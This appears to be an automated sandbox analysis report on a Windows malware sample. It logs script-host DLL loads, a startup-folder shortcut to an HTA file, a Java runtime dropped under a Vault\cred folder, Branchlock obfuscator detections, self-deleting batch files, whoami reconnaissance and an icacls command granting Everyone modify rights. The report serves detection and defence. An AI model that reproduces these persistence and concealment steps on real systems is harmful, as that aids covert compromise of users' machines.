Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: startup.lnk.9.dr

LNK file: ..\..\AppData\Roaming\Microsoft\UProof\start.hta

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000010.00000002.3210536015.0000000074AA7000.00000002.00000001.01000000.00000011.sdmp, javaw.exe, 00000013.00000002.3227337817.0000000074AA7000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libzip\zip.pdb** source: javaw.exe, 00000010.00000002.3209667965.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp, javaw.exe, 00000013.00000002.3226062299.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libmanagement\management.pdb&& source: javaw.exe, 00000013.00000002.3227054856.0000000073F75000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunmscapi\sunmscapi.pdb source: javaw.exe, 00000010.00000002.3210045786.0000000070045000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libmanagement\management.pdb source: javaw.exe, 00000013.00000002.3227054856.0000000073F75000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnio\nio.pdb'' source: javaw.exe, 00000010.00000002.3210220560.0000000073E17000.00000002.00000001.01000000.00000015.sdmp, javaw.exe, 00000013.00000002.3225518070.000000006FB47000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdbj source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp, javaw.exe, 00000013.00000002.3224057643.000000006D6F6000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000010.00000002.3210220560.0000000073E17000.00000002.00000001.01000000.00000015.sdmp, javaw.exe, 00000013.00000002.3225518070.000000006FB47000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnet\net.pdb.. source: javaw.exe, 00000010.00000002.3209510549.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp, javaw.exe, 00000013.00000002.3225755254.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: javaw.exe, javaw.exe, 00000013.00000002.3226453449.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: javaw.exe, javaw.exe, 00000013.00000002.3226694507.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: javaw.exe, 00000010.00000002.3209876576.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp, javaw.exe, 00000013.00000002.3226453449.000000006FD31000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000010.00000002.3209667965.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp, javaw.exe, 00000013.00000002.3226062299.000000006FCEC000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunec\sunec.pdb99 source: javaw.exe, 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000010.00000000.3164227804.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000013.00000002.3218511796.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp, javaw.exe, 00000013.00000000.3210841601.0000000000E29000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: javaw.exe, 00000010.00000002.3210390998.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp, javaw.exe, 00000013.00000002.3226694507.0000000073F11000.00000020.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000010.00000002.3209510549.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp, javaw.exe, 00000013.00000002.3225755254.000000006FCCE000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libsunec\sunec.pdb source: javaw.exe, 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000010.00000002.3209774475.000000006FD16000.00000002.00000001.01000000.00000012.sdmp, javaw.exe, 00000013.00000002.3226266590.000000006FD16000.00000002.00000001.01000000.00000012.sdmp

Data Obfuscation

Yara detected Branchlock Obfuscator

Source: Yara match	File source: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3365267882.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3260775914.00000000154C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000003.3228221272.0000000001555000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3206788432.0000000015650000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.3164511187.0000000001314000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3269384093.0000000000565000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3222106413.000000001573A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.3211107800.0000000001614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: unzip.exe PID: 7952, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 6996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: javaw.exe PID: 3580, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\res.jar, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\checker.jar, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\applet\3.jar, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\history.jar, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\lib\deploy\recovery.jar, type: DROPPED

Source: msvcp140_1.dll.15.dr

Static PE information: 0x8D619244 [Wed Mar 1 11:51:32 2045 UTC]

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

Code function: 15_2_0041FE80 LoadLibraryA,GetProcAddress,strlen,malloc,strcpy,strcat,FindFirstFileExA,FindNextFileA,FindClose,FreeLibrary,FindFirstFileA,

15_2_0041FE80

Source: wget.exe.0.dr	Static PE information: section name: /4
Source: wget.exe.0.dr	Static PE information: section name: /14
Source: unpack200.exe.15.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Code function: 15_2_00424D8F push ecx; iretd	15_2_00424E03
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_00E28244 push ecx; ret	16_2_00E28257
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 16_2_6FA71928 push edx; mov dword ptr [esp], eax	16_2_6FA7196C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FA51928 push edx; mov dword ptr [esp], eax	19_2_6FA5196C
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD70CA9 pushad ; iretd	19_2_6FD70CB1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD32888 push eax; iretd	19_2_6FD32889
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD3288D pushad ; iretd	19_2_6FD3288E
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD7155C pushad ; iretd	19_2_6FD71565
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD7123F pushad ; iretd	19_2_6FD71245
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_6FD6C0AE push ecx; ret	19_2_6FD6C0C1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F1F6C0 push eax; ret	19_2_73F1F6DE
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_73F1F511 push ecx; ret	19_2_73F1F524
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02FACAFF push es; retn 0001h	19_2_02FACC0F
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02FA5691 push cs; retf	19_2_02FA56B1
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02FB077A push edx; iretd	19_2_02FB077B
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0D8F7 push 00000000h; mov dword ptr [esp], esp	19_2_02F0D921
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0A21B push ecx; ret	19_2_02F0A225
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0A20A push ecx; ret	19_2_02F0A21A
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0B3B7 push 00000000h; mov dword ptr [esp], esp	19_2_02F0B3DD
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0BB67 push 00000000h; mov dword ptr [esp], esp	19_2_02F0BB8D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0D8E0 push 00000000h; mov dword ptr [esp], esp	19_2_02F0D921
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0B947 push 00000000h; mov dword ptr [esp], esp	19_2_02F0B96D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F0C477 push 00000000h; mov dword ptr [esp], esp	19_2_02F0C49D
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Code function: 19_2_02F12D14 push esp; ret	19_2_02F12D15

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runDeleteHTA.vbs

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javacpl.cpl

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\README.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\THIRDPARTYLICENSEREADME.txt

Boot Survival

Uses whoami command line tool to query computer and username

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\whoami.exe whoami /groups

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.lnk

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Windows\SysWOW64\mshta.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\runMainSequence.bat			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat			Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook\ConfigContextData 1

Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\javaw.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
